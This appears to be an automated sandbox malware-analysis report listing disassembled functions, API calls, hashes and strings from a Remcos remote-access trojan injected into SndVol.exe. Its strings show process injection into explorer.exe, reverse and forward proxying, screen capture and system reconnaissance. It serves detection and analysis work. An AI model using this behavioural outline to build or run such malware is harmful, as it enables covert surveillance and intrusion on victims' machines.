                                                                        • _free.LIBCMT ref: 2916A9C3
                                                                        • _free.LIBCMT ref: 2916A9CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 2441525078-0
                                                                        • Opcode ID: 5ced71b9ea1d760102d7d7fa1ce1cc9665d78c77d837c59238bc9d683662edb4
                                                                        • Instruction ID: fdfa17333e37db4b4731c288ca5ab49a8e8628b70e72dd0dd28a754901713ebc
                                                                        • Opcode Fuzzy Hash: 5ced71b9ea1d760102d7d7fa1ce1cc9665d78c77d837c59238bc9d683662edb4
                                                                        • Instruction Fuzzy Hash: F031B372D0524ABBDF05AFA6CC48DDE3B7CAF02368B214159F910561A0DB348BA2D7A0
                                                                        Function 291354A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 291354BF
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2913556F
                                                                        • TranslateMessage.USER32(?), ref: 2913557E
                                                                        • DispatchMessageA.USER32(?), ref: 29135589
                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,291A4F78), ref: 29135641
                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 29135679
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                        • API String ID: 2956720200-749203953
                                                                        • Opcode ID: d91ac2b8174dcf32e2f7920e24a119211b54097d26b1fc4c98e45e7b075fe064
                                                                        • Instruction ID: f2fac80d8cacd6a0e2798ffd394e54f1a5b97d76bc09897bb77e949ffd28cb7b
                                                                        • Opcode Fuzzy Hash: d91ac2b8174dcf32e2f7920e24a119211b54097d26b1fc4c98e45e7b075fe064
                                                                        • Instruction Fuzzy Hash: 7B410432B042407BDB58EB73CC8885E37B9AFA5658F80991CF51693584DF389B0BC796
                                                                        Function 2914330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 29143452
                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 29143460
                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 2914346D
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 2914348D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 2914349A
                                                                        • CloseHandle.KERNEL32(?), ref: 291434A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                        • String ID:
                                                                        • API String ID: 297527592-0
                                                                        • Opcode ID: 50239082fa210eb7bf811fb3cd916962421a36feb6211c0bd309d27e56f9eeb7
                                                                        • Instruction ID: 8548851547165802304d92c512c7552b4879864f0c694a8834454f714bcf6efa
                                                                        • Opcode Fuzzy Hash: 50239082fa210eb7bf811fb3cd916962421a36feb6211c0bd309d27e56f9eeb7
                                                                        • Instruction Fuzzy Hash: D2411331A08245BFE711AB27EC49F9B3BACFF8976CF105519F544D60D0DA3496038AA2
                                                                        Function 291781A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 291781B5
                                                                          • Part of subcall function 29176802: HeapFree.KERNEL32(00000000,00000000,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?), ref: 29176818
                                                                          • Part of subcall function 29176802: GetLastError.KERNEL32(?,?,29180CEF,?,00000000,?,00000000,?,29180F93,?,00000007,?,?,291814DE,?,?), ref: 2917682A
                                                                        • _free.LIBCMT ref: 291781C1
                                                                        • _free.LIBCMT ref: 291781CC
                                                                        • _free.LIBCMT ref: 291781D7
                                                                        • _free.LIBCMT ref: 291781E2
                                                                        • _free.LIBCMT ref: 291781ED
                                                                        • _free.LIBCMT ref: 291781F8
                                                                        • _free.LIBCMT ref: 29178203
                                                                        • _free.LIBCMT ref: 2917820E
                                                                        • _free.LIBCMT ref: 2917821C
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: c096f773da8772f54d7d45a73a95ee138cb0d9a9096ee1a09c8aff1f94997eaa
                                                                        • Instruction ID: d4e470cb7e04cdf7e2fc2f51627016eb1a0551052d2a778b312ba7df6fa1f017
                                                                        • Opcode Fuzzy Hash: c096f773da8772f54d7d45a73a95ee138cb0d9a9096ee1a09c8aff1f94997eaa
                                                                        • Instruction Fuzzy Hash: D011D4B6900309BFCB41DF56CC92CD93BB5FF14398B0194A0FA488B220DB71DB529B81
                                                                        Function 04468EBE Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                        • Instruction ID: 8ac24f8365ce157657b4dd037c5f16e7127bd7abf277d610ccdf95adca110ea7
                                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                        • Instruction Fuzzy Hash: B811B976501108BFDF01FF55C840CDD3B66EF04399B4144AABA0A8FA62D631EA509F42
                                                                        Function 044263B7 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 278COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __Init_thread_footer.LIBCMT ref: 04426403
                                                                        • __Init_thread_footer.LIBCMT ref: 04426440
                                                                          • Part of subcall function 0445551E: __onexit.LIBCMT ref: 04455524
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer$__onexit
                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$kG
                                                                        • API String ID: 1878262506-4252883706
                                                                        • Opcode ID: 8d317a6f5b7ecda909677f14a043b1173aca65308a73afb302eb3a2399ca05ea
                                                                        • Instruction ID: 30048cbdfaf2de7aca1f9f7381b5b65bd96656d965ed644862e9a8b2d8c1cd3f
                                                                        • Opcode Fuzzy Hash: 8d317a6f5b7ecda909677f14a043b1173aca65308a73afb302eb3a2399ca05ea
                                                                        • Instruction Fuzzy Hash: 7C91FA71604224BFEF11BF35AE40A6B3B9AEB40308F82443FF949972A2DF756C448759
                                                                        Function 2914A045 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 2914A04A
                                                                        • GdiplusStartup.GDIPLUS(291A4ACC,?,00000000), ref: 2914A07C
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 2914A108
                                                                        • Sleep.KERNEL32(000003E8), ref: 2914A18E
                                                                        • GetLocalTime.KERNEL32(?), ref: 2914A196
                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 2914A285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                        • API String ID: 489098229-3790400642
                                                                        • Opcode ID: e069ecdefa322e2e4c97c9ad4af8dd931b2462595061248e230971d52e8dec4c
                                                                        • Instruction ID: a9ed03c39323cc29b0d197d9eb5777f4dd0255e90035bf886a7fd04694186998
                                                                        • Opcode Fuzzy Hash: e069ecdefa322e2e4c97c9ad4af8dd931b2462595061248e230971d52e8dec4c
                                                                        • Instruction Fuzzy Hash: 6C51C870E00158BAEB84EBB6CC949FD7B7D6F65218F84A029E405A7180EF349F4BD794
                                                                        Function 291474D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 29147530
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • Sleep.KERNEL32(00000064), ref: 2914755C
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 29147590
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                        • API String ID: 1462127192-2001430897
                                                                        • Opcode ID: 5f8bbe885e4f5d21c0de63c2cc3d0c0df9963f011c6852822089f850e5a58ed2
                                                                        • Instruction ID: 12ce5173a1fdd8d0085df87f748a589a6f3ecfc5fe8da92b49f4fea1151cdc30
                                                                        • Opcode Fuzzy Hash: 5f8bbe885e4f5d21c0de63c2cc3d0c0df9963f011c6852822089f850e5a58ed2
                                                                        • Instruction Fuzzy Hash: 99315871D10118BAEB48EB62DC95DED7738AF24208FC0A559D50A670D4EF206F8FCA98
                                                                        Function 291373E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(291A2B14,00000000,291A52D8,00003000,00000004,00000000,00000001), ref: 29137418
                                                                        • GetCurrentProcess.KERNEL32(291A2B14,00000000,00008000,?,00000000,00000001,00000000,29137691,C:\Windows\SysWOW64\SndVol.exe), ref: 291374D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentProcess
                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                        • API String ID: 2050909247-4242073005
                                                                        • Opcode ID: 7753eb2563f676f28239786bff3ea2a83d3949bff1a9ac155844a3b548300a2c
                                                                        • Instruction ID: 8e73c6a391939f1ae1d47b5f641fae6893530c024b8fb0f6d59dca767b13802a
                                                                        • Opcode Fuzzy Hash: 7753eb2563f676f28239786bff3ea2a83d3949bff1a9ac155844a3b548300a2c
                                                                        • Instruction Fuzzy Hash: B831AF71301384ABE359EF67DC84F5A77B9BF10259FA04818F90192548CB38DE02CB75
                                                                        Function 2914D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 2914D507
                                                                          • Part of subcall function 2914D5A0: RegisterClassExA.USER32(00000030), ref: 2914D5EC
                                                                          • Part of subcall function 2914D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 2914D607
                                                                          • Part of subcall function 2914D5A0: GetLastError.KERNEL32 ref: 2914D611
                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 2914D53E
                                                                        • lstrcpynA.KERNEL32(291A4B60,Remcos,00000080), ref: 2914D558
                                                                        • Shell_NotifyIconA.SHELL32(00000000,291A4B48), ref: 2914D56E
                                                                        • TranslateMessage.USER32(?), ref: 2914D57A
                                                                        • DispatchMessageA.USER32(?), ref: 2914D584
                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 2914D591
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                        • String ID: Remcos
                                                                        • API String ID: 1970332568-165870891
                                                                        • Opcode ID: 25f8f76299612918c816bba62639d310168af73c7db930f189a103ac59ccf6c8
                                                                        • Instruction ID: 351c7a75b3390ce5bd811e1deb9c3899e68646ae8a400dd6c9a1337493548c35
                                                                        • Opcode Fuzzy Hash: 25f8f76299612918c816bba62639d310168af73c7db930f189a103ac59ccf6c8
                                                                        • Instruction Fuzzy Hash: 75013C71A0018CABEB10ABA3EC4DF9ABBBCFB85708F014019F91696188DB7C9505DB91
                                                                        Function 2917CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a1170d159764f44e8cb0f0d8f8196c31ba10989d1a74efc4fe08871d68b44c6
                                                                        • Instruction ID: 61503cd584293122b84e17f69c60a112c86a309a66f1f9ec117bac5588b4b189
                                                                        • Opcode Fuzzy Hash: 7a1170d159764f44e8cb0f0d8f8196c31ba10989d1a74efc4fe08871d68b44c6
                                                                        • Instruction Fuzzy Hash: B7C1C174E0438EABDB05DFAAC840BED7BB0AF59318F149589E914A73C1C7349B42CB61
                                                                        Function 29183E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,291840DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 29183EAF
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183F32
                                                                        • __alloca_probe_16.LIBCMT ref: 29183F6A
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,291840DC,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183FC5
                                                                        • __alloca_probe_16.LIBCMT ref: 29184014
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29183FDC
                                                                          • Part of subcall function 291761B8: HeapAlloc.KERNEL32(00000000,29165329,?,?,291688C7,?,?,00000000,?,?,2913DE9D,29165329,?,?,?,?), ref: 291761EA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,291840DC,00000000,00000000,?,00000001,?,?,?,?), ref: 29184058
                                                                        • __freea.LIBCMT ref: 29184083
                                                                        • __freea.LIBCMT ref: 2918408F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                        • String ID:
                                                                        • API String ID: 3256262068-0
                                                                        • Opcode ID: ad23beb065c7c156370f83a788db507be94707203095234ad8a2fd32242fbbc7
                                                                        • Instruction ID: 6330d6b17487b51bb22baf323207d8eb22ad6be40525ebdce04a7917e09ce2c9
                                                                        • Opcode Fuzzy Hash: ad23beb065c7c156370f83a788db507be94707203095234ad8a2fd32242fbbc7
                                                                        • Instruction Fuzzy Hash: DA91E272E102069AFB148E76CD81EEFBBB5BF18358F084559E904E7180DB35CA439FA0
                                                                        Function 291751FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29178295: GetLastError.KERNEL32(00000020,?,2916A875,?,?,?,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B), ref: 29178299
                                                                          • Part of subcall function 29178295: _free.LIBCMT ref: 291782CC
                                                                          • Part of subcall function 29178295: SetLastError.KERNEL32(00000000,2916F9F8,?,?,00000020,00000000,?,?,?,2915DD92,0000003B,?,00000041,00000000,00000000), ref: 2917830D
                                                                          • Part of subcall function 29178295: _abort.LIBCMT ref: 29178313
                                                                        • _memcmp.LIBVCRUNTIME ref: 291754A4
                                                                        • _free.LIBCMT ref: 29175515
                                                                        • _free.LIBCMT ref: 2917552E
                                                                        • _free.LIBCMT ref: 29175560
                                                                        • _free.LIBCMT ref: 29175569
                                                                        • _free.LIBCMT ref: 29175575
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                        • String ID: C
                                                                        • API String ID: 1679612858-1037565863
                                                                        • Opcode ID: c88b6a6af0d4c7144bee18b8e3d8d0cf100318e11a717ef4d96a75e0af1948c7
                                                                        • Instruction ID: 152e72e0c90ba99e7897fe5aeb19b15264b7467e9812a87d38ae9d66c4ea4afb
                                                                        • Opcode Fuzzy Hash: c88b6a6af0d4c7144bee18b8e3d8d0cf100318e11a717ef4d96a75e0af1948c7
                                                                        • Instruction Fuzzy Hash: 93B12675E0131ADBDB64CF19C884ADDB7B4FF48308F5085AAD90AA7250E770AE91CF90
                                                                        Function 04465F17 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$_abort_memcmp
                                                                        • String ID: C
                                                                        • API String ID: 137591632-1037565863
                                                                        • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                        • Instruction ID: 9dd8c3b1efc2ccfdfe12d9e7c84e5b9119e0c3146ead46a21b535bf12d39451c
                                                                        • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                                        • Instruction Fuzzy Hash: E7B11775A012299FDF24DF18C884AAEB7B4FB48304F5045AED90AA7351E731BE90CF41
                                                                        Function 29144945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tcp$udp
                                                                        • API String ID: 0-3725065008
                                                                        • Opcode ID: f651fc293508d88ab3ece847739033786bddf4e73088d3f27c43d4e3b41e7eb7
                                                                        • Instruction ID: 8fdcc3a75b3588947373b0174bba6e7184139db20181c5dbf9a15062efd4f9bb
                                                                        • Opcode Fuzzy Hash: f651fc293508d88ab3ece847739033786bddf4e73088d3f27c43d4e3b41e7eb7
                                                                        • Instruction Fuzzy Hash: C8718170E083428FD7188F56C486B6AB7E4EF8C399F10646EF98997291D774CB06CB52
                                                                        Function 29141530 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Eventinet_ntoa
                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                        • API String ID: 3578746661-168337528
                                                                        • Opcode ID: 2bfcb552fcf0bdaa772e89bb0de36070af4d49be984e3cdaa48c4c8999bac40c
                                                                        • Instruction ID: 58947249f6ba7e913e86c3494f0da0e7ff37256d2926a3e729453b0b604610b9
                                                                        • Opcode Fuzzy Hash: 2bfcb552fcf0bdaa772e89bb0de36070af4d49be984e3cdaa48c4c8999bac40c
                                                                        • Instruction Fuzzy Hash: E751E731F042406BE748FB37CD55A6D37A66FB8248F80A929E4115B295DF389F0BC786
                                                                        Function 29185F84 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,2918707F), ref: 29185FA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DecodePointer
                                                                        • String ID: acos$asin$log$log10$pow$sqrt
                                                                        • API String ID: 3527080286-3190521889
                                                                        • Opcode ID: b6c306ec3728682bc213230ff7c36e17b178fd2dcf8ea959d82a0d621c903609
                                                                        • Instruction ID: 57959b9f4a5d6211c709896f9406af7512169486aa34a2b3169383ea23ddc635
                                                                        • Opcode Fuzzy Hash: b6c306ec3728682bc213230ff7c36e17b178fd2dcf8ea959d82a0d621c903609
                                                                        • Instruction Fuzzy Hash: 84515D70910609DBEB04DF66E9885ECBFB0FF49388F510185E581BB65ACB358B22DF19
                                                                        Function 29147D1A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 29147F67: __EH_prolog.LIBCMT ref: 29147F6C
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,291960B4), ref: 29147E17
                                                                        • CloseHandle.KERNEL32(00000000), ref: 29147E20
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 29147E2F
                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 29147DE3
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                        • String ID: <$@$Temp
                                                                        • API String ID: 1704390241-1032778388
                                                                        • Opcode ID: 4f1fd085edf0fae60d8fce210d75db6418205b555639983917c47139e6699b85
                                                                        • Instruction ID: e39d3dcc94ef6a7a7d2a174cca293083ee2bbcc9649021398792bbf7e3fda112
                                                                        • Opcode Fuzzy Hash: 4f1fd085edf0fae60d8fce210d75db6418205b555639983917c47139e6699b85
                                                                        • Instruction Fuzzy Hash: 43418231E00149ABEB48EB73DC55AED7738AF24318FC09168E50A661E4DF345B8BCB94
                                                                        Function 2913799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,291A4EE0,29195FB4,?,00000000,29138037,00000000), ref: 29137A00
                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,29138037,00000000,?,?,0000000A,00000000), ref: 29137A48
                                                                          • Part of subcall function 29134AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 29134B36
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,29138037,00000000,?,?,0000000A,00000000), ref: 29137A88
                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 29137AA5
                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 29137AD0
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 29137AE0
                                                                          • Part of subcall function 29134B96: WaitForSingleObject.KERNEL32(?,000000FF,?,291A4EF8,29134C49,00000000,?,?,?,291A4EF8,?), ref: 29134BA5
                                                                          • Part of subcall function 29134B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2913548B), ref: 29134BC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                        • String ID: .part
                                                                        • API String ID: 1303771098-3499674018
                                                                        • Opcode ID: e39d9053897da103aea2590d523fea91bddc10be2612132fde6484e9914dd9d1
                                                                        • Instruction ID: 761426a53a84d1d26a82e4d10baeebf0f15f615a49edec9af4e4118ede119eb1
                                                                        • Opcode Fuzzy Hash: e39d9053897da103aea2590d523fea91bddc10be2612132fde6484e9914dd9d1
                                                                        • Instruction Fuzzy Hash: CE31F331508344BFD344DB22DC4499BB7BCFFA0359F80891DF48692140EB34AB09CB9A
                                                                        Function 2917ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,2915DD92,?,?,?,2917AF1A,00000001,00000001,?), ref: 2917AD23
                                                                        • __alloca_probe_16.LIBCMT ref: 2917AD5B
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,2915DD92,?,?,?,2917AF1A,00000001,00000001,?), ref: 2917ADA9
                                                                        • __alloca_probe_16.LIBCMT ref: 2917AE40
